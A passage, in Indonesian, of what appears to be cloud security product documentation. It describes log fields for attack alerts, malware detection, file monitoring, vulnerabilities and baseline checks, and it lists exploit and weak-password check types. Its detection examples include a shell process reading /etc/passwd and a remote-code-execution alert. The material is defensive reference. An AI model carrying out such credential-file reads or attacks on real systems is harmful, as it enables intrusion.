stacktrace | Informasi stack. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | Waktu peringatan dipicu. | 2023-10-09 15:19:15 |
timestamp | Timestamp saat peringatan dipicu, dalam milidetik. | 1696835955070 |
type | Jenis serangan. Nilai yang valid:
| rce |
url | URL permintaan. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | UUID event serangan. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | UUID host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | Alamat IP publik host. | 1.2.XX.XX |
intranet_ip | Alamat IP pribadi host. | 172.16.XX.XX |
sas_group_name | Nama grup server di Security Center. | Group 1 |
instance_id | ID instans host. | i-wz995eivg28f1m** |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log deteksi malware
Field | Deskripsi | Contoh |
bucket_name | Nama bucket. | ***-test |
event_id | ID peringatan. | 802210 |
event_name | Nama peringatan. | Program penambangan |
md5 | Hash MD5 file. | 6bc2bc******53d409b1 |
sha256 | Hash SHA256 file. | f038f9525******7772981e87f85 |
result | Hasil deteksi. Nilai yang valid:
| 0 |
file_path | Path file. | test.zip/bin_test |
etag | Pengidentifikasi file OSS. | 6BC2B******853D409B1 |
risk_level | Tingkat risiko. Nilai yang valid:
| remind |
source | Skema deteksi. Nilai yang valid:
| OSS |
parent_md5 | Hash MD5 file induk atau paket terkompresi. | 3d0f8045bb9****** |
parent_sha256 | Hash SHA256 file induk atau paket terkompresi. | 69b643d6******a3fb859fa |
parent_file_path | Nama file induk atau paket terkompresi. | test.zip |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Log peristiwa pemantauan file inti
Field | Deskripsi | Contoh |
start_time | Waktu paling baru peristiwa terjadi. Satuan: detik. | 1718678414 |
uuid | UUID klien. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | Path file. | /etc/passwd |
proc_path | Path proses. | /usr/bin/bash |
rule_id | ID aturan yang terkena. | 123 |
rule_name | Nama aturan. | file_test_rule |
cmdline | Baris perintah. | bash /opt/a |
operation | Operasi pada file. | READ |
risk_level | Level peringatan. | 2 |
pid | ID proses. | 45324 |
proc_permission | Izin proses. | rwxrwxrwx |
instance_id | ID instans. | i-wz995eivg2**** |
internet_ip | Alamat IP publik. | 192.0.2.1 |
intranet_ip | Alamat IP pribadi. | 172.16.0.1 |
instance_name | Nama instans. | aegis-test |
platform | Jenis sistem operasi. | Linux |
Log deteksi tanpa agen
Field umum untuk kerentanan, baseline, dan sampel berbahaya
Field | Deskripsi | Contoh |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
sas_group_name | Grup aset server di Security Center. | default |
start_time | Timestamp mulai, dalam detik. Ini juga menunjukkan waktu terjadinya event. | 1719472214 |
Field risiko kerentanan
Field | Deskripsi | Contoh |
vul_name | Nama kerentanan. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | Alias kerentanan. | Kerentanan isu kode gson (CVE-2022-25647) |
vul_primary_id | ID kunci utama kerentanan. | 990174361 |
type | Jenis kerentanan. Nilai yang valid:
| sca |
alert_level | Level risiko kerentanan. Nilai valid:
| asap |
instance_name | Hostname. | hhht-linux-*** |
operation | Tindakan yang dilakukan pada kerentanan. Nilai valid:
| new |
status | Status kerentanan. Nilai valid:
| 1 |
tag | Tag kerentanan. Nilai yang valid:
Catatan Tag untuk tipe kerentanan lainnya adalah string acak. | oval |
Field pemeriksaan baseline
Field | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Setel waktu kedaluwarsa kata sandi |
check_item_level | Tingkat risiko item pemeriksaan. Nilai yang valid:
| high |
check_type | Jenis item pemeriksaan. | Otentikasi identitas |
risk_level | Level item risiko. Nilai valid:
| low |
operation | Operasi. Nilai valid:
| new |
risk_name | Nama item pemeriksaan berisiko. | Pemeriksaan kepatuhan kebijakan kata sandi |
status | Status item pemeriksaan. Nilai valid:
| 1 |
sub_type_alias_name | Alias subtipe. | Baseline keamanan standar Alibaba Cloud - CentOS Linux 7/8 |
sub_type_name | Nama subtipe baseline. Untuk informasi lebih lanjut tentang nilai valid subtipe baseline, lihat Daftar tipe dan subtipe baseline. | hc_centos7 |
type_name | Nama tipe. | hc_best_secruity |
type_alias_name | Alias tipe. | Praktik terbaik |
container_id | ID kontainer. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | Nama kontainer. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Field sampel berbahaya
Field | Deskripsi | Contoh |
alert_level | Level risiko event peringatan. Nilai valid:
| suspicious |
alert_name | Nama peringatan sampel berbahaya. | Proses mencurigakan - Berbasis SSH |
operation | Operasi. Nilai yang valid:
| new |
status | Status risiko sampel berbahaya. Nilai valid:
| 0 |
suspicious_event_id | ID event peringatan. | 909361 |
Field file sensitif
Field | Deskripsi | Contoh |
alert_level | Level risiko. Nilai valid:
| high |
rule_name | Nama tipe file. | Token Ionic |
file_path | Path file sensitif. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | Hasil pemeriksaan. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Lampiran
Daftar jenis dan subtipe baseline
Nama tipe | Nama subtipe | Deskripsi |
hc_exploit | hc_exploit_redis | Eksploitasi ancaman penting: Akses tidak sah ke Redis |
hc_exploit_activemq | Eksploitasi ancaman penting: Akses tidak sah ke ActiveMQ | |
hc_exploit_couchdb | Eksploitasi ancaman penting: Akses tidak sah ke CouchDB | |
hc_exploit_docker | Eksploitasi ancaman penting: Akses tidak sah ke Docker | |
hc_exploit_es | Eksploitasi ancaman penting: Akses tidak sah ke Elasticsearch | |
hc_exploit_hadoop | Eksploitasi ancaman penting: Akses tidak sah ke Hadoop | |
hc_exploit_jboss | Eksploitasi ancaman penting: Akses tidak sah ke JBoss | |
hc_exploit_jenkins | Eksploitasi ancaman penting: Akses tidak sah ke Jenkins | |
hc_exploit_k8s_api | Eksploitasi ancaman penting: Akses tidak sah ke server API Kubernetes | |
hc_exploit_ldap | Eksploitasi ancaman penting: Akses tidak sah ke LDAP (lingkungan Windows) | |
hc_exploit_ldap_linux | Eksploitasi ancaman penting: Akses tidak sah ke OpenLDAP (lingkungan Linux) | |
hc_exploit_memcache | Eksploitasi ancaman penting: Akses tidak sah ke Memcached | |
hc_exploit_mongo | Eksploitasi ancaman penting: Akses tidak sah ke MongoDB | |
hc_exploit_pgsql | Eksploitasi ancaman penting: Akses tidak sah ke PostgreSQL | |
hc_exploit_rabbitmq | Eksploitasi ancaman penting: Akses tidak sah ke RabbitMQ | |
hc_exploit_rsync | Eksploitasi ancaman penting: Akses tidak sah ke rsync | |
hc_exploit_tomcat | Eksploitasi ancaman penting: Kerentanan penyertaan file Apache Tomcat AJP | |
hc_exploit_zookeeper | Eksploitasi ancaman penting: Akses tidak sah ke ZooKeeper | |
hc_container | hc_docker | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Docker |
hc_middleware_ack_master | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan node master Kubernetes (ACK) | |
hc_middleware_ack_node | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan node Kubernetes (ACK) | |
hc_middleware_k8s | Standar Alibaba Cloud: Pemeriksaan baseline keamanan node master Kubernetes | |
hc_middleware_k8s_node | Standar Alibaba Cloud: Pemeriksaan baseline keamanan node Kubernetes | |
cis | hc_suse 15_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 15 |
hc_aliyun_linux3_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux 3 | |
hc_aliyun_linux_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_bind_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Bind | |
hc_centos 6_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 6 | |
hc_centos 7_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 7 | |
hc_centos 8_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 8 | |
hc_debian_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Debian Linux 8/9/10 | |
hc_iis_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan IIS | |
hc_informix_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Informix | |
hc_jboss_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan JBoss | |
hc_mongo_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan MongoDB | |
hc_mssql_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan SQL Server | |
hc_mysql_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan MySQL | |
hc_nginx_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Nginx | |
hc_oracle_djbh | MLPS Level 3: Pemeriksaan Baseline Kepatuhan Oracle | |
hc_pgsql_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan PostgreSQL | |
hc_redhat 6_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Red Hat Linux 6 | |
hc_redhat_djbh_l3 | MLPS Level 3 - Pemeriksaan baseline kepatuhan Red Hat Linux 7 | |
hc_redis_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Redis | |
hc_suse 10_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 10 | |
hc_suse 12_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 12 | |
hc_suse_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan SUSE 11 | |
hc_ubuntu 14_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Ubuntu 14 | |
hc_ubuntu_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Ubuntu 16/18/20 | |
hc_was_djbh | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Websphere Application Server | |
hc_weblogic_djbh | MLPS Level 3 - Pemeriksaan Baseline Kepatuhan WebLogic | |
hc_win 2008_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Windows 2008 R2 | |
hc_win 2012_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Windows 2012 R2 | |
hc_win 2016_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Windows 2016/2019 | |
hc_aliyun_linux_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_centos 6_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan CentOS Linux 6 | |
hc_centos 7_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan CentOS Linux 7 | |
hc_debian_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Debian Linux 8 | |
hc_redhat 7_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Red Hat Linux 7 | |
hc_ubuntu_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Ubuntu 16/18 | |
hc_win 2008_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Windows 2008 R2 | |
hc_win 2012_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Windows 2012 R2 | |
hc_win 2016_djbh_l2 | MLPS 2.0 Level 2: Pemeriksaan baseline kepatuhan Windows 2016/2019 | |
hc_aliyun_linux_cis | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_centos 6_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan CentOS Linux 6 | |
hc_centos 7_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan CentOS Linux 7 | |
hc_centos 8_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan CentOS Linux 8 | |
hc_debian 8_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Debian Linux 8 | |
hc_ubuntu 14_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Ubuntu 14 | |
hc_ubuntu 16_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Ubuntu 16/18/20 | |
hc_win 2008_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Windows Server 2008 R2 | |
hc_win 2012_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Windows Server 2012 R2 | |
hc_win 2016_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Windows Server 2016/2019 R2 | |
hc_kylin_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan Kylin | |
hc_uos_djbh_l3 | MLPS 2.0 Level 3: Pemeriksaan baseline kepatuhan UOS | |
hc_best_security | hc_aliyun_linux | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Alibaba Cloud Linux/Aliyun Linux 2 |
hc_centos 6 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan CentOS Linux 6 | |
hc_centos 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan CentOS Linux 7/8 | |
hc_debian | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Debian Linux 8/9/10 | |
hc_redhat 6 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Red Hat Linux 6 | |
hc_redhat 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Red Hat Linux 7/8 | |
hc_ubuntu | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Ubuntu | |
hc_windows_2008 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2008 R2 | |
hc_windows_2012 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2012 R2 | |
hc_windows_2016 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2016/2019 | |
hc_db_mssql | Standar Alibaba Cloud: Pemeriksaan baseline keamanan SQL Server | |
hc_memcached_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Memcached | |
hc_mongodb | Standar Alibaba Cloud: Pemeriksaan baseline keamanan MongoDB 3.x | |
hc_mysql_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan MySQL | |
hc_oracle | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Oracle 11g | |
hc_pgsql_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan PostgreSQL | |
hc_redis_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Redis | |
hc_apache | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Apache | |
hc_iis_8 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan IIS 8 | |
hc_nginx_linux | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Nginx | |
hc_suse 15 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan SUSE Linux 15 | |
tomcat 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Apache Tomcat | |
weak_password | hc_mongodb_pwd | Kata sandi lemah: Deteksi kata sandi lemah login MongoDB (mendukung versi 2.x) |
hc_weakpwd_ftp_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login FTP | |
hc_weakpwd_linux_sys | Kata sandi lemah: Pemeriksaan kata sandi lemah login sistem Linux | |
hc_weakpwd_mongodb 3 | Kata sandi lemah: Deteksi kata sandi lemah login MongoDB | |
hc_weakpwd_mssql | Kata sandi lemah: Pemeriksaan kata sandi lemah login database SQL Server | |
hc_weakpwd_mysql_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login database MySQL | |
hc_weakpwd_mysql_win | Kata sandi lemah: Pemeriksaan kata sandi lemah login database MySQL (Windows) | |
hc_weakpwd_openldap | Kata sandi lemah: Pemeriksaan kata sandi lemah login OpenLDAP | |
hc_weakpwd_oracle | Kata sandi lemah: Deteksi kata sandi lemah login Oracle | |
hc_weakpwd_pgsql | Kata sandi lemah: Pemeriksaan kata sandi lemah login database PostgreSQL | |
hc_weakpwd_pptp | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan pptpd | |
hc_weakpwd_redis_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login database Redis | |
hc_weakpwd_rsync | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan rsync | |
hc_weakpwd_svn | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan SVN | |
hc_weakpwd_tomcat_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah konsol Apache Tomcat | |
hc_weakpwd_vnc | Kata sandi lemah: Pemeriksaan kata sandi lemah VNC Server | |
hc_weakpwd_weblogic | Kata sandi lemah: Deteksi kata sandi lemah login WebLogic 12c | |
hc_weakpwd_win_sys | Kata sandi lemah: Pemeriksaan kata sandi lemah login sistem Windows |